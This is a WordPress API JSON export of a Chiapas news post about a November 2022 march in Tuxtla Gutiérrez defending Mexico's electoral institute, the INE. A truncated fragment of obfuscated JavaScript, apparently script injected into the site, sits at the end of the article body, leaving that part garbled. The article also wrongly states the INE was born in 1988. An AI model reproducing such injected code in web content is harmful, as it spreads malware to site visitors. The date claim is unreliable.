{"id":6603,"date":"2022-11-14T03:04:56","date_gmt":"2022-11-14T03:04:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6603"},"modified":"2022-11-14T03:04:57","modified_gmt":"2022-11-14T03:04:57","slug":"marchan-en-tuxtla-en-defensa-del-ine","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6603","title":{"rendered":"Marchan en Tuxtla en defensa del INE"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221113-WA0025-1024x576.jpg\" alt=\"\" class=\"wp-image-6604\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221113-WA0025-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221113-WA0025-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221113-WA0025-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221113-WA0025-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221113-WA0025.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 13 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Cerca de mil personas se concentraron y marcharon en Tuxtla Guti\u00e9rrez en defensa del Instituto Nacional Electoral.<\/p>\n\n\n\n<p>Desde las diez de la ma\u00f1ana comenz\u00f3 la concentraci\u00f3n en el Parque Bicentenario y a las 11 de la ma\u00f1ana parti\u00f3 con rumbo al parque central de la capital chiapaneca.<\/p>\n\n\n\n<p>A nivel nacional se ha dado a conocer sobre esta controversia que, en caso de aprobarse de manera intacta la iniciativa de crear al Instituto Nacional de Elecciones y Consultas, los consejeros ser\u00e1n designados a trav\u00e9s de una elecci\u00f3n y dichos consejeros ser\u00e1n propuestos por el Presidente, el Congreso de la Uni\u00f3n y la Suprema Corte de Justicia de la Naci\u00f3n.<\/p>\n\n\n\n<p>A la marcha de este domingo, se sumaron diferentes estados siendo la m\u00e1s numerosa la realizada en la Ciudad de M\u00e9xico.<\/p>\n\n\n\n<p>Al grito de \u201cEl INE no se toca\u201d, transcurri\u00f3 la caravana en Tuxtla Guti\u00e9rrez, donde acusaron al gobierno federal de dar un golpe a la democracia del pa\u00eds.<\/p>\n\n\n\n<p>En este espacio tambi\u00e9n se record\u00f3 que, el Instituto Nacional Electoral naci\u00f3 en el a\u00f1o de 1988 a consecuencia de la crisis electoral de ese entonces y por ello es necesario que el INE sea garante de las elecciones en el pa\u00eds.<\/p>\n\n\n\n<p>Rub\u00e9n Zuarth Esquinca, diputado local del Partido Revolucionario Institucional (PRI) expres\u00f3 que a nivel estatal y nacional cerrar\u00e1n filas para la defensa del Instituto.<\/p>\n\n\n\n<p>\u201cEsta marcha es ciudadana, no se trata de un tema pol\u00edtico, por eso estamos ac\u00e1, no nos mueve otro tema que ese, en defensa del INE\u201d, expres\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 13 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Cerca de mil personas se concentraron y marcharon en Tuxtla Guti\u00e9rrez en defensa del Instituto Nacional Electoral. Desde las diez de la ma\u00f1ana comenz\u00f3 la concentraci\u00f3n en el Parque Bicentenario y a las 11 de la ma\u00f1ana parti\u00f3 con rumbo al parque central de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6604,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-6603","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6603","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6603"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6603\/revisions"}],"predecessor-version":[{"id":6605,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6603\/revisions\/6605"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6604"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6603"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6603"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6603"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}